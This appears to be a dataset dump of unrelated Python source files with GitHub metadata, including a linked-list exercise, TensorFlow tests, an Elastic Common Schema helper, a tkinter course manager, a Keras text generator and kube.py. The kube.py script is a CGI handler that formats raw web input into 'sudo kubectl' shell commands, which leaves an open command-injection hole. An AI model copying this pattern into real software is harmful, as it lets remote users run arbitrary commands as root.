<contact>Janez Demsar (janez.demsar(@at@)fri.uni-lj.si)</contact>
"""
from OWWidget import *
import OWGUI, math, re
from orngWrap import Preprocessor
class OWPreprocessing(OWWidget):
contextHandlers = {"": PerfectDomainContextHandler()}
def __init__(self,parent=None, signalManager = None):
OWWidget.__init__(self, parent, signalManager, "Preprocessing")
self.inputs = [("Examples", ExampleTable, self.setData)]
self.outputs = [("Preprocessor", Preprocessor), ("Examples", ExampleTable)]
OWGUI.button(self.controlArea, self, "Apply", callback=self.apply)
self.loadSettings()
self.apply()
self.adjustSize()
def setData(self, data):
self.data = data
self.sendData()
def sendData(self):
if not self.data or not self.preprocessor:
self.preprocessed = self.data
else:
self.preprocessed = self.preprocessor.processData(self.data)
self.send("Examples", self.preprocessed)
def apply(self):
# The widget needs to construct a new instance of Preprocessor
# If it modified and send the same instance every time, it would
# modify an instance which has been passed to another widget which
# might have a disabled connection and should not get any modifications
# (and would even not get notified about the preprocessor having been changed)
self.preprocessor = Preprocessor()
self.send("Preprocessor", self.preprocessor)
| [
"stefie10@alum.mit.edu"
] | stefie10@alum.mit.edu |
63fc33ebf5a416adf5ad443484da0991e3e0de86 | 5373d5c41d6850492c294fc5bb52eede898d0181 | /find_length_of_loop.py | 0b70db472a9dd42a1430404bc3ed612f27c70728 | [] | no_license | agvaibhav/linked-list | 4dc2e79e9f84b955ec7e519c13679f1f802e7c25 | c561d671c6257c41fad9a38e38143ac4280948ad | refs/heads/master | 2020-03-26T10:31:07.540276 | 2019-08-09T09:39:26 | 2019-08-09T09:39:26 | 144,801,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | def countNodesinLoop(head):
#Your code here
temp = head
slow = temp.next
fast = temp.next.next
for i in range(500):
if temp.next is None:
break
temp = temp.next
if temp.next is None:
return 0
while slow != fast:
slow = slow.next
fast = fast.next.next
count = 1
slow = slow.next
while slow != fast:
count += 1
slow = slow.next
return count
| [
"noreply@github.com"
] | agvaibhav.noreply@github.com |
53e5f61af1f380bd9bd675436d443b5109b3d873 | 67b8ff4f52b4f09982e46516961240942370bb37 | /tests/garage/tf/misc/test_tensor_utils.py | 5a4e5b511fe6db0c9da2b31623fef61ddf3e7a4a | [
"MIT"
] | permissive | lywong92/garage | daee8f373301c43c3e4530b7642a22900ef80cd1 | 96cb8887fcae90531a645d540653010e7fe10fcc | refs/heads/master | 2020-06-12T02:33:23.871320 | 2019-06-27T20:09:53 | 2019-06-27T20:58:59 | 194,169,356 | 1 | 0 | MIT | 2019-06-27T22:09:46 | 2019-06-27T22:09:46 | null | UTF-8 | Python | false | false | 2,227 | py | """
This script creates a test that tests functions in garage.tf.misc.tensor_utils.
"""
import numpy as np
import tensorflow as tf
from garage.tf.misc.tensor_utils import compute_advantages
from garage.tf.misc.tensor_utils import get_target_ops
from tests.fixtures import TfGraphTestCase
class TestTensorUtil(TfGraphTestCase):
def test_compute_advantages(self):
"""Tests compute_advantages function in utils."""
discount = 1
gae_lambda = 1
max_len = 1
rewards = tf.placeholder(
dtype=tf.float32, name='reward', shape=[None, None])
baselines = tf.placeholder(
dtype=tf.float32, name='baseline', shape=[None, None])
adv = compute_advantages(discount, gae_lambda, max_len, baselines,
rewards)
# Set up inputs and outputs
rewards_val = np.ones(shape=[2, 1])
baselines_val = np.zeros(shape=[2, 1])
desired_val = np.array([1., 1.])
adv = self.sess.run(
adv, feed_dict={
rewards: rewards_val,
baselines: baselines_val,
})
assert np.array_equal(adv, desired_val)
def test_get_target_ops(self):
var = tf.get_variable(
'var', [1], initializer=tf.constant_initializer(1))
target_var = tf.get_variable(
'target_var', [1], initializer=tf.constant_initializer(2))
self.sess.run(tf.global_variables_initializer())
assert target_var.eval() == 2
update_ops = get_target_ops([var], [target_var])
self.sess.run(update_ops)
assert target_var.eval() == 1
def test_get_target_ops_tau(self):
var = tf.get_variable(
'var', [1], initializer=tf.constant_initializer(1))
target_var = tf.get_variable(
'target_var', [1], initializer=tf.constant_initializer(2))
self.sess.run(tf.global_variables_initializer())
assert target_var.eval() == 2
init_ops, update_ops = get_target_ops([var], [target_var], tau=0.2)
self.sess.run(update_ops)
assert np.allclose(target_var.eval(), 1.8)
self.sess.run(init_ops)
assert np.allclose(target_var.eval(), 1)
| [
"noreply@github.com"
] | lywong92.noreply@github.com |
7e170929558b7027c5f971790f56a2df4f97320e | 8e6c4def374ba21c934f6856c0333a1e8bff69db | /190520/Quiz02.py | 12854d9e9a693c1f970e9157d15f2d9c6002d74a | [] | no_license | inuse918/Python_Practice_2 | d5a930a95b51181330abc6601d80f71b67780740 | de4dd6ec8d96e9d259566916b9e7f08402e7917d | refs/heads/master | 2020-05-06T13:20:08.153295 | 2019-12-25T23:07:47 | 2019-12-25T23:07:47 | 180,128,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | def sum(x,y):
return x+y
user1=int(input("첫 번째 정수: "))
user2=int(input("두 번째 정수: "))
print("합은",sum(user1,user2)) | [
"s2018s34@e-mirim.hs.kr"
] | s2018s34@e-mirim.hs.kr |
b7f17fe614504cdf44e7f4deb2041839a257fb40 | 2021a5988ef3d2d050b3614ccd5864872045cadb | /kube.py | b8b8a488c69afeb045bee69aa7b06129ce46d417 | [] | no_license | khushbooagrawal245/DevOps-Integeration-Portal | ac48221aae16f68611362d877828eb01e5f101dd | d9a7e19548a40481ffadd61ff62975741868818a | refs/heads/main | 2023-06-10T16:52:42.564801 | 2021-07-03T09:37:09 | 2021-07-03T09:37:09 | 382,575,832 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,875 | py | #!/usr/bin/python3
print("content-type:text/html")
print()
import cgi
import subprocess as sp
f = cgi.FieldStorage()
cmd = f.getvalue("x")
val = cmd.split()
#Creating deployment
if val[0]=="1":
dname = val[2]
iname = val[1]
o=sp.getoutput("sudo kubectl create deployment {} --image={} --kubeconfig /root/admin.conf".format(dname,iname))
print(o)
#Creating pod
elif val[0]=="2":
pname = val[2]
iname = val[1]
o=sp.getoutput("sudo kubectl run {} --image={} --kubeconfig /root/admin.conf".format(pname,iname))
print(o)
#Delete pod
elif val[0]=="3":
pname = val[1]
o=sp.getoutput("sudo kubectl delete pod {} --kubeconfig /root/admin.conf".format(pname))
print(o)
#delete deployment
elif val[0]=="4":
dname = val[1]
o=sp.getoutput("sudo kubectl delete deployment {} --kubeconfig /root/admin.conf".format(dname))
print(o)
#expose deployment
elif val[0]=="5":
dname = val[1]
port_no = val[2]
etype = val[3]
o=sp.getoutput("sudo kubectl expose deployment {} --type={} --port={} --kubeconfig /root/admin.conf".format(dname,etype,port_no))
print(o)
#scale deployment
elif val[0]=="6":
dname = val[1]
replica= val[2]
o=sp.getoutput("sudo kubectl scale deployment {} --replicas={} --kubeconfig /root/admin.conf".format(dname,replica))
print(o)
#list pods
elif val[0]=="7":
o=sp.getoutput("sudo kubectl get pods --kubeconfig /root/admin.conf")
print(o)
#list deployments
elif val[0]=="8":
o=sp.getoutput("sudo kubectl get deployments --kubeconfig /root/admin.conf")
print(o)
#list services
elif val[0]=="9":
o=sp.getoutput("sudo kubectl get svc --kubeconfig /root/admin.conf")
print(o)
#thank you note
elif val[0]=="10":
print("I'm happy to help")
#error
else:
val[0]=="404"
print("Something went wrong...") | [
"noreply@github.com"
] | khushbooagrawal245.noreply@github.com |
c51081a1c6b74ebb8d098b6d0ea54463cde817ce | 80bb15e7ce4c7726003ade301cb311b57b75be9c | /src/text_avg_tfidf_main.py | 461bcfe2148bc4c5039bca7b4bc65135303a2504 | [] | no_license | shiyunchen/DeepTextClassifier | ba4f55a0eed321491e91cfe2d56bf78fd1333852 | 210b055d4dca2c7bc731bd3bd4bea12f85ebf576 | refs/heads/master | 2020-05-20T15:07:45.321826 | 2019-05-08T15:52:18 | 2019-05-08T15:52:18 | 185,636,183 | 0 | 0 | null | 2019-05-08T15:45:32 | 2019-05-08T15:45:32 | null | UTF-8 | Python | false | false | 1,234 | py | # coding: utf-8
from __future__ import print_function
from __future__ import division
import tensorflow as tf
import numpy as np
from text_avg_tfidf import Model
from dataset import DataSetIDF as DataSet
from config import ConfigAvgTFIDF as Config
import tools
my_config = Config()
my_data = DataSet(my_config, True)
my_config.we = my_data.we
my_model = Model(my_config)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
def train():
summary_writer = tf.summary.FileWriter(my_config.log_dir, sess.graph)
my_model.train_dev_test(sess, [my_data.train_x, my_data.train_y, my_data.train_seq_len, my_data.train_tfidf],
test_xy=[my_data.test_x, my_data.test_y, my_data.test_seq_len, my_data.test_tfidf],
save_model=True,
summary_writer=summary_writer)
def get_repr():
samples_v = my_model.get_represent(sess, [my_data.train_x, my_data.train_y, my_data.train_seq_len])
samples_v = np.array(samples_v)
print ("samples_vector: {}".format(samples_v.shape))
tools.save_params([samples_v, my_data.train_y], my_config.log_dir+"/samples_vector.pkl")
if __name__ == '__main__':
train()
# get_repr()
| [
"myqway@outlook.com"
] | myqway@outlook.com |
1f88d1a8bf3f6b3695ad54b42360ae9375e218c6 | 0bcc028259d40a6a33f41072ab9e7076603519e8 | /Learning_Languages/Learning_Python/area.py | a48d8f6b95e03437c89cbea28704e43aaf925e5b | [] | no_license | ravzac14/Skill_Buildin | f0700b8c6203e5806bdba2892a318a025ea5828a | e473116969df126bcae8c347b26e829513cb83f0 | refs/heads/master | 2021-01-22T03:25:52.400521 | 2015-07-06T20:25:32 | 2015-07-06T20:25:32 | 25,415,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | import math
print "Radius is 6"
r = 6
A = 0
A = math.pi*(r**2)
print "Area is " A
| [
"raver_zack@yahoo.com"
] | raver_zack@yahoo.com |
75f070a45d6c3ae4c2844bb87300d5d1bf8efc9e | 3925e9e9fdd9f65c0095cd9db2ad7c1298fa1e36 | /src/ecs/ecs.py | 81e57e6776a7101ae5906d7fe0ce295c860ce21f | [] | no_license | dtact/ecs | 343f156f518c28b5e171e13febfe3b995dd8274a | 56f1e327a6380ab7f48baae9005bf1503466ff5e | refs/heads/master | 2023-06-12T03:07:01.319105 | 2021-06-23T20:42:17 | 2021-06-23T20:42:17 | 367,652,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,812 | py | # noqa: D101,D100,D102
import json
import dateutil.parser
from datetime import datetime
class Int(int): # noqa D101
def __new__(cls, val): # noqa D102
if val is None:
return
return super().__new__(cls, val)
class String(str):
def __new__(cls, val):
if val is None:
return
return super().__new__(cls, val)
class Bytes(Int):
pass
class Timestamp(str):
def __new__(cls, val):
if val is None:
return
if isinstance(val, str):
# normalize
val = dateutil.parser.isoparse(val).isoformat("T").replace("+00:00", "Z")
elif isinstance(val, float) or isinstance(val, int):
# normalize
val = datetime.fromtimestamp(val).isoformat("T").replace("+00:00", "Z")
else:
val = val.isoformat("T").replace("+00:00", "Z")
return super().__new__(cls, val)
class Duration(Int):
pass
class Path(String):
pass
class Query(String):
def __new__(cls, val):
if val is None:
return
elif type(val) is dict:
if not val:
return
from urllib.parse import urlencode
val = urlencode(val)
return super().__new__(cls, val)
elif type(val) is str:
return super().__new__(cls, val)
else:
raise Exception("Unsupported type for query")
class Provider(String):
pass
class Action(String):
pass
class Message(String):
pass
class Code(String):
pass
class Id(String):
pass
class Name(String):
pass
class Dataset(String):
pass
class Outcome(String):
pass
class Kind(String):
pass
class Type(list):
def __init__(self, val):
if isinstance(val, list):
super().__init__(val)
elif isinstance(val, str):
super().__init__([val])
else:
raise Exception("Expected list for type, got: ", val)
class Group(list):
def __init__(self, val):
if isinstance(val, list):
super().__init__(val)
elif isinstance(val, str):
super().__init__([val])
else:
raise Exception("Expected list for group, got: ", val)
class Category(list):
def __init__(self, val):
if isinstance(val, list):
super().__init__(val)
elif isinstance(val, str):
super().__init__([val])
else:
raise Exception("Expected list for category, got: ", val)
class Port(Int):
pass
class Packets(Int):
pass
class MAC(String):
""" """
pass
class Address(String):
""" """
pass
class Base(dict):
def __init__(self, *args):
d = {}
for arg in args:
if arg is None:
continue
elif arg == {}:
continue
allowed = False
for (k, t) in self._allowed.items():
if type(arg) is t:
allowed = True
d[k] = arg
if not allowed:
raise Exception(
f"Type {type(arg)} not supported for {type(self)}, allowed are: {self._allowed}"
)
super().__init__(d)
class Original(String):
pass
class User(Base):
_allowed = {"name": Name, "id": Id}
class Target(User):
pass
User._allowed.update({"target": Target})
class Error(Base):
_allowed = {"code": Code, "id": Id, "message": Message}
class Event(Base):
"Meta-information specific to ECS."
_allowed = {
"original": Original,
"provider": Provider,
"action": Action,
"id": Id,
"category": Category,
"type": Type,
"dataset": Dataset,
"kind": Kind,
"outcome": Outcome,
"group": Group,
"duration": Duration,
}
def __init__(self, name, *args, type=None):
super().__init__(name, *args)
if self.get("original"):
self["original"] = json.dumps(self.get("original"))
class Source(Base):
"""
Fields about the source side of network connection, used with destination.
Source fields capture details about the sender of a network
exchange/packet. These fields are populated from a network event,
packet, or other event containing details of a network transaction.
Source fields are usually populated in conjunction with destination
fields. The source and destination fields are considered the baseline
and should always be filled if an event contains source and destination
details from a network transaction. If the event also contains
identification of the client and server roles, then the client
and server fields should also be populated.
"""
_allowed = {
"address": Address,
"bytes": Bytes,
"packets": Packets,
"port": Port,
"user": User,
}
def __init__(self, *args, **kwargs):
super().__init__(self, *args, **kwargs)
address = self.get("address")
if address:
try:
import ipaddress
self["ip"] = str(ipaddress.ip_address(address))
except ValueError:
self["domain"] = address
class Destination(Source):
pass
class Client(Source):
pass
class Server(Source):
pass
class Account(Base):
_allowed = {"id": Id, "name": Name}
class Region(String):
pass
class Useragent(Base):
_allowed = {"original": Original}
class IP(list):
def __init__(self, *vals):
if not len(vals):
return
super().__init__([val for val in vals if val])
class Hash(list):
def __init__(self, *vals):
if not len(vals):
return
super().__init__([val for val in vals if val])
class Hosts(list):
def __init__(self, *vals):
if not len(vals):
return
super().__init__([val for val in vals if val])
class Users(list):
def __init__(self, *vals):
if not len(vals):
return
super().__init__([val for val in vals if val])
class Related(Base):
_allowed = {"ip": IP, "hash": Hash, "hosts": Hosts, "user": Users}
class Cloud(Base):
_allowed = {"account": Account, "region": Region}
class Method(String):
pass
class StatusCode(Int):
""" """
pass
class Version(String):
""" """
pass
class Request(Base):
""" """
_allowed = {"method": Method}
class Response(Base):
""" """
_allowed = {"status_code": StatusCode}
class HTTP(Base):
"""
Fields related to HTTP activity. Use the url field set to store the url of
the request.
"""
_allowed = {"request": Request, "response": Response, "version": Version}
class URL(Base):
"""
Fields that let you store URLs in various forms.
URL fields provide support for complete or partial URLs, and supports the
breaking down into scheme, domain, path, and so on.
"""
_allowed = {"original": Original, "path": Path, "query": Query}
class Custom(dict):
def __init__(self, name, *args, type=None):
d = {}
for arg in args:
if arg is None:
continue
if type is str:
d = str(arg)
elif type is bool:
d = bool(arg)
elif type is float:
d = float(arg)
elif type is int:
d = int(arg)
elif isinstance(arg, Custom):
d = {
**d,
**arg,
}
else:
print(f"Unsupported type {name} {arg} {type(arg)}")
if d == {}:
return
super().__init__({name: d})
class Trace(Base):
_allowed = {"id": Id}
class Cipher(String):
pass
class TLS(Base):
_allowed = {"version": Version, "cipher": Cipher}
class ECS(Base):
"""
The Elastic Common Schema (ECS) is an open source specification, developed
with support from the Elastic user community. ECS defines a common set of
fields to be used when storing event data in Elasticsearch, such as logs
and metrics.
"""
_allowed = {
"source": Source,
"destination": Destination,
"client": Client,
"server": Server,
"event": Event,
"@timestamp": Timestamp,
"cloud": Cloud,
"user_agent": Useragent,
"error": Error,
"custom": Custom,
"related": Related,
"http": HTTP,
"url": URL,
"tls": TLS,
"trace": Trace,
}
def __init__(self, *args, **kwargs):
super().__init__(self, *args, **kwargs)
self["ecs"] = {"version": "1.9.0"}
| [
"remco@dutchcoders.io"
] | remco@dutchcoders.io |
990151a9287e7e16c6474fe1ce97cd40525b54d2 | 28af5c332d684c4b0133a1d4a84e091578543918 | /COM220/Trabalho_Final/disciplina.py | d7165921badc8b8a9490962f88bcad1129b2661e | [] | no_license | carloshssouza/UniversityStudies | dac36e3970191358cbaf6cb3db7fb7b82785bbfe | 3142d797cb298da81622cc19ac98fadb3e123af9 | refs/heads/master | 2023-07-25T17:18:40.775832 | 2023-02-02T14:03:19 | 2023-02-02T14:03:19 | 254,239,916 | 7 | 0 | null | 2023-08-30T23:43:47 | 2020-04-09T01:21:27 | C | UTF-8 | Python | false | false | 7,996 | py | import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import os.path
import pickle
import sys
class OpcaoVazia(Exception):
pass
class CodigoIgual(Exception):
pass
class NomeIgual(Exception):
pass
class HorasNegativa(Exception):
pass
class AnoSemestreIncorreto(Exception):
pass
class CursoNaoCriado(Exception):
pass
class Disciplina:
def __init__(self, codigo, nome, cargaHoraria, grade):
self.__codigo = codigo
self.__nome = nome
self.__cargaHoraria = cargaHoraria
self.__grade = grade
self.__nota = 0
self.__anoSemestre = ''
def getCodigo(self):
return self.__codigo
def getNome(self):
return self.__nome
def getCargaHoraria(self):
return self.__cargaHoraria
def getGrade(self):
return self.__grade
def getNota(self):
return self.__nota
def getAnoSemestre(self):
return self.__anoSemestre
def addNota(self, nota):
self.__nota = nota
def addAnoSemestre(self, texto):
self.__anoSemestre = texto
class LimiteInsereDisciplinas(tk.Toplevel):
def __init__(self, controle, listaNomeGrades):
tk.Toplevel.__init__(self)
self.geometry('250x150')
self.title("Disciplina")
self.controle = controle
self.frameNome = tk.Frame(self)
self.frameCodigo = tk.Frame(self)
self.frameCargaHoraria = tk.Frame(self)
self.frameAnoSemestre = tk.Frame(self)
self.frameGrade = tk.Frame(self)
self.frameButton = tk.Frame(self)
self.frameCodigo.pack()
self.frameNome.pack()
self.frameCargaHoraria.pack()
self.frameAnoSemestre.pack()
self.frameGrade.pack()
self.frameButton.pack()
self.labelCodigo = tk.Label(self.frameCodigo,text="Código: ")
self.labelCodigo.pack(side="left")
self.inputCodigo = tk.Entry(self.frameCodigo, width=20)
self.inputCodigo.pack(side="left")
self.labelNome = tk.Label(self.frameNome,text="Nome: ")
self.labelNome.pack(side="left")
self.inputNome = tk.Entry(self.frameNome, width=20)
self.inputNome.pack(side="left")
self.labelCargaHoraria = tk.Label(self.frameCargaHoraria, text="Carga Horaria")
self.labelCargaHoraria.pack(side="left")
self.inputCargaHoraria = tk.Entry(self.frameCargaHoraria, width=20)
self.inputCargaHoraria.pack(side="left")
self.labelAnoSemestre = tk.Label(self.frameAnoSemestre,text="Ano e semestre(ex:2018.1): ")
self.labelAnoSemestre.pack(side="left")
self.inputAnoSemestre = tk.Entry(self.frameAnoSemestre, width=20)
self.inputAnoSemestre.pack(side="left")
self.labelGrade = tk.Label(self.frameGrade,text="Escolha a Grade: ")
self.labelGrade.pack(side="left")
self.escolhaCombo = tk.StringVar()
self.combobox = ttk.Combobox(self.frameGrade, width = 15 , textvariable = self.escolhaCombo)
self.combobox.pack(side="left")
self.combobox['values'] = listaNomeGrades
self.buttonSubmit = tk.Button(self.frameButton ,text="Enter")
self.buttonSubmit.pack(side="left")
self.buttonSubmit.bind("<Button>", controle.enterHandler)
self.buttonClear = tk.Button(self.frameButton ,text="Clear")
self.buttonClear.pack(side="left")
self.buttonClear.bind("<Button>", controle.clearHandler)
self.buttonFecha = tk.Button(self.frameButton ,text="Concluído")
self.buttonFecha.pack(side="left")
self.buttonFecha.bind("<Button>", controle.fechaHandler)
def mostraJanela(self, titulo, msg):
messagebox.showinfo(titulo, msg)
class LimiteMostraDisciplinas():
def __init__(self, str):
messagebox.showinfo('Lista de disciplinas', str)
class CtrlDisciplina():
def __init__(self, controlePrincipal):
self.ctrlPrincipal = controlePrincipal
def getDisciplina(self, nome):
discRet = None
for disc in self.ctrlPrincipal.ctrlCurso.getListaDisciplinas():
if disc.getNome() == nome:
print("TUdo certo")
discRet = disc
return discRet
def getListaCodDisciplinas(self):
listaCod = []
for disc in self.ctrlPrincipal.ctrlCurso.getListaDisciplinas():
listaCod.append(disc.getCodigo())
return listaCod
def getListaNomeDisciplinas(self):
listaNomeDisciplina = []
for disc in self.ctrlPrincipal.ctrlGrade.getLista():
listaNomeDisciplina.append(disc.getNome())
return listaNomeDisciplina
def insereDisciplinas(self):
listaNomeGrades = self.ctrlPrincipal.ctrlGrade.getListaNomeGrades()
self.limiteIns = LimiteInsereDisciplinas(self, listaNomeGrades)
def mostraDisciplinas(self):
str = 'Código -- Nome -- Carga H\n'
for disc in self.ctrlPrincipal.ctrlCurso.getListaDisciplinas():
str += disc.getCodigo() + ' -- ' + disc.getNome() + f' -- {disc.getCargaHoraria()}\n'
str += disc.getGrade().getNome() + '\n\n'
self.limiteLista = LimiteMostraDisciplinas(str)
def enterHandler(self, event):
codigo = self.limiteIns.inputCodigo.get()
nome = self.limiteIns.inputNome.get()
cargah = self.limiteIns.inputCargaHoraria.get()
anoSemestre = self.limiteIns.inputAnoSemestre.get()
gradeSel = self.limiteIns.escolhaCombo.get()
grade = self.ctrlPrincipal.ctrlGrade.getGrade(gradeSel)
try:
if codigo == '' or nome == '' or anoSemestre == '' or cargah == '' or gradeSel == '':
raise OpcaoVazia
if codigo in self.getListaCodDisciplinas():
raise CodigoIgual
if nome in self.getListaNomeDisciplinas():
raise NomeIgual
if int(cargah) <= 0:
raise HorasNegativa
palavra = anoSemestre.split('.')
if len(palavra) != 2 or not palavra[0] or not palavra[1]:
raise AnoSemestreIncorreto
if len(self.ctrlPrincipal.ctrlCurso.listaCursos) == 0:
raise CursoNaoCriado
except OpcaoVazia:
self.limiteIns.mostraJanela('Alerta', 'Campo vazio')
except CodigoIgual:
self.limiteIns.mostraJanela('Alerta', 'Codigo já existente')
except NomeIgual:
self.limiteIns.mostraJanela('Alerta', 'Nome já existente')
except HorasNegativa:
self.limiteIns.mostraJanela('Alerta', 'Horas negativas ou zeradas não são permitidas')
except AnoSemestreIncorreto:
self.limiteIns.mostraJanela('Alerta', 'Digite como mostrado no exemplo')
except CursoNaoCriado:
self.limiteIns.mostraJanela('Alerta', 'É necessario criar um curso antes de adicionar')
else:
for curso in self.ctrlPrincipal.ctrlCurso.listaCursos:
if curso.getGrade().getNome() == grade.getNome():
disciplina = Disciplina(codigo, nome, int(cargah), grade)
disciplina.addAnoSemestre(anoSemestre)
curso.getGrade().addDisciplina(disciplina)
self.ctrlPrincipal.ctrlGrade.addDisciplina(disciplina)
self.limiteIns.mostraJanela('Sucesso', 'Disciplina cadastrada com sucesso')
self.clearHandler(event)
def clearHandler(self, event):
self.limiteIns.inputCodigo.delete(0, len(self.limiteIns.inputCodigo.get()))
self.limiteIns.inputNome.delete(0, len(self.limiteIns.inputNome.get()))
self.limiteIns.inputCargaHoraria.delete(0, len(self.limiteIns.inputCargaHoraria.get()))
def fechaHandler(self, event):
self.limiteIns.destroy()
| [
"carlossouza_94@hotmail.com"
] | carlossouza_94@hotmail.com |
8f94a6f2dfd570da54c01803c2536171634418e5 | 4b5a19fab3304aeb617f24f6bc4f7ffb9ccbbd93 | /ml/textGen.py | 531b9ed5aabe6e12a97038bd980b550529edaaae | [] | no_license | Harvard-Jahseh/Impressionator | a0878d022c615334d05d2106479a98ca57e8b9e0 | a1069e76c83df7a1da5ef4a7baf8a0216e00e1cb | refs/heads/master | 2022-12-14T19:30:41.453482 | 2019-09-14T20:35:28 | 2019-09-14T20:35:28 | 208,361,583 | 1 | 0 | null | 2022-12-11T05:47:36 | 2019-09-13T23:20:28 | Python | UTF-8 | Python | false | false | 4,243 | py |
from keras.models import Sequential
from keras.layers import LSTM, Embedding, Dense, Dropout
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
from keras.callbacks import ModelCheckpoint
import keras.utils as ku
#https://github.com/shivsondhi/Text-Generator/blob/master/textGenerator_words.py
from tensorflow import set_random_seed
from numpy.random import seed
set_random_seed(2)
seed(1)
import pandas as pd
import numpy as np
import string, os, csv, random
def get_sequence_of_tokens(corpus, tokenizer):
#create a dictionary of every word corresponding to a unique number. By default keras.tokenizer class also creates 3 other objects that it may use.
t.fit_on_texts(corpus)
total_words = len(tokenizer.word_index) + 1 #word_index is the dictionary ^
#map each word to an integer value and then create the input_sequences
input_sequences = []
for line in corpus:
token_list = t.texts_to_sequences([line])[0]
for i in range(1, len(token_list)):
n_gram_sequence = token_list[:i+1]
input_sequences.append(n_gram_sequence)
return input_sequences, total_words
def get_padded_sequences(input_sequences, total_words):
#pad every input sequence so that we have uniform length inputs.
max_sequence_len = max([len(x) for x in input_sequences])
input_sequences = np.array(pad_sequences(input_sequences, maxlen=max_sequence_len, padding='pre'))
#split the sequences taking the first n-1 columns as input and the last column as the label / output
predictors, label = input_sequences[:,:-1], input_sequences[:,-1]
label = ku.to_categorical(label, num_classes=total_words)
return predictors, label, max_sequence_len
def create_model(max_sequence_len, total_words):
#Create a sequential model with one LSTM unit
input_len = max_sequence_len - 1
model = Sequential()
model.add(Embedding(total_words, 10, input_length=input_len))
model.add(LSTM(5))
model.add(Dropout(0.1))
model.add(Dense(total_words, activation='softmax'))
model.compile(optimizer='adam', loss='categorical_crossentropy')
return model
def generate_text(tokenizer, seed_text, next_words, model, max_sequence_len):
#predict the next word for the desired number of times. model.predict will output an integer.
for _ in range(next_words):
token_list = tokenizer.texts_to_sequences([seed_text])[0]
token_list = pad_sequences([token_list], maxlen=max_sequence_len-1, padding='pre')
print("broke")
predicted = model.predict_classes(token_list, batch_size = 2)
#map the integer output to the word in the tokenizer dictionary. Append the word to seed_text and continue.
output_word = ""
for word, index in tokenizer.word_index.items():
if index == predicted:
output_word = word
break
seed_text += " " + output_word
return seed_text
text_sequences = []
modes = ['train', 'generate', 'retrain', 'none']
mode = modes[1]
num_epochs = 0
with open("./movie_lines.tsv",) as tsvfile:
reader = csv.reader(tsvfile, delimiter='\t')
count = 0
for row in reader:
if len(row) < 5:
continue
else:
text_sequences.append(row[4])
count += 1
if count > 10000:
break
#print(len(text_sequences))
t = Tokenizer()
input_sequences, total_words = get_sequence_of_tokens(text_sequences, t)
predictors, label, max_sequence_len = get_padded_sequences(input_sequences, total_words)
model = create_model(max_sequence_len, total_words)
savepath = "model_weights.hdf5"
checkpoint = ModelCheckpoint(savepath, monitor="loss", verbose=1, save_best_only=True, mode="min")
callbacks_list = [checkpoint]
model.fit(predictors, label, epochs=num_epochs, verbose=1, callbacks=callbacks_list)
best_file = "model_weights.hdf5"
model.load_weights(best_file)
model.compile(loss='categorical_crossentropy', optimizer='adam', verbose = 1)
print("compiling")
seed_texts = ['We should',"Do that"]
i = 1
for seed_text in seed_texts:
print("Seed {0}".format(i))
next_words = random.randint(6, max_sequence_len)
generated_headline = generate_text(t, seed_text, next_words, model, max_sequence_len)
print(generated_headline, end="\n\n")
i += 1
| [
"zheng.harvey5@gmail.com"
] | zheng.harvey5@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.